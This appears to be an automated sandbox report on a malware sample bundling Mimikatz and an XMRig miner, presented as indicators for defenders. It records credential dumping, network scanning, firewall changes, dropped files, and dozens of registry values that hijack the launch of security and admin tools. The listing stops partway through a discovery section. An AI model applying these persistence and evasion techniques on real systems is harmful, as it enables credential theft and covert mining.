Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2024 22:23
Behavioral task
behavioral1
Sample
2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe
-
Size
9.8MB
-
MD5
00480422fe8d80a2c60f739cafb1f753
-
SHA1
88df42b30b715e4d9cdc2f1d330ec28743b9f48e
-
SHA256
0538d87dbe92041441a3027620f5fdfc79e3d109442e1fed366774f0f02b2e77
-
SHA512
1625bf49c40d0d906f722b288a7801930807f2038ac9af2614e6c3e4433d874478e413554617abaad5dbe5f4f5ae8e194a975811500a4770909aff310d833f1c
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4376 created 1392 4376 mgmtcbi.exe 37 -
Xmrig family
-
Contacts a large (30502) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2908-179-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-183-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-200-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-217-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-223-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-235-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-248-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-497-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-498-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-500-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-755-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig behavioral2/memory/2908-756-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1644-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1644-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023c9e-6.dat mimikatz behavioral2/memory/4516-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3436-138-0x00007FF74D470000-0x00007FF74D55E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4412 netsh.exe 3744 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4516 mgmtcbi.exe 4376 mgmtcbi.exe 3716 wpcap.exe 1052 liuibviiz.exe 3436 vfshost.exe 5028 iyibcmiuc.exe 3436 xohudmc.exe 2940 rwdxsq.exe 2908 ltbtbc.exe 2468 iyibcmiuc.exe 2016 iyibcmiuc.exe 1116 iyibcmiuc.exe 3124 iyibcmiuc.exe 2576 iyibcmiuc.exe 2792 iyibcmiuc.exe 1164 iyibcmiuc.exe 4980 iyibcmiuc.exe 2888 mgmtcbi.exe 2176 iyibcmiuc.exe 4104 iyibcmiuc.exe 2732 iyibcmiuc.exe 4120 iyibcmiuc.exe 3328 iyibcmiuc.exe 864 iyibcmiuc.exe 1584 iyibcmiuc.exe 792 iyibcmiuc.exe 1644 btuizeiim.exe 4296 mgmtcbi.exe -
Loads dropped DLL 12 IoCs
pid Process 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 3716 wpcap.exe 1052 liuibviiz.exe 1052 liuibviiz.exe 1052 liuibviiz.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 62 ifconfig.me 63 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mgmtcbi.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\rwdxsq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 mgmtcbi.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe -
resource yara_rule behavioral2/files/0x0007000000023cf0-134.dat upx behavioral2/memory/3436-135-0x00007FF74D470000-0x00007FF74D55E000-memory.dmp upx behavioral2/memory/3436-138-0x00007FF74D470000-0x00007FF74D55E000-memory.dmp upx behavioral2/files/0x0007000000023cfb-141.dat upx behavioral2/memory/5028-142-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/5028-146-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/files/0x0007000000023cf8-163.dat upx behavioral2/memory/2908-164-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2468-172-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2016-176-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-179-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/1116-181-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-183-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/3124-186-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2576-190-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2792-194-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/1164-198-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-200-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/4980-203-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2176-211-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/4104-215-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-217-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2732-220-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-223-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/4120-225-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/3328-229-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/864-232-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/1584-234-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-235-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/792-237-0x00007FF62A1C0000-0x00007FF62A21B000-memory.dmp upx behavioral2/memory/2908-248-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2908-497-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2908-498-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2908-500-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2908-755-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx behavioral2/memory/2908-756-0x00007FF7A4500000-0x00007FF7A4620000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\jhetmctcv\Corporate\mimilib.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libeay32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trfo-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ssleay32.dll mgmtcbi.exe File created C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\crli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\ip.txt mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\cnli-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\exma-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libxml2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\vfshost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\schoedcl.xml mgmtcbi.exe File created C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimidrv.sys mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\scan.bat mgmtcbi.exe File created C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\Shellcode.ini mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Result.txt btuizeiim.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\posh-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\zlib1.dll mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File created C:\Windows\ime\mgmtcbi.exe mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\Corporate\log.txt cmd.exe File created C:\Windows\ybemumnz\mgmtcbi.exe 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\coli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.xml mgmtcbi.exe File created C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture64.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\btuizeiim.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\upbdrjv\swrpwe.exe mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\mgmtcbi.exe 2024-12-21_00480422fe8d80a2c60f739cafb1f753_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tibe-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tucl-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ucl.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\xdvl-0.dll mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trch-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\vimpcsvc.xml mgmtcbi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5000 sc.exe 4732 sc.exe 1880 sc.exe 4724 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language liuibviiz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 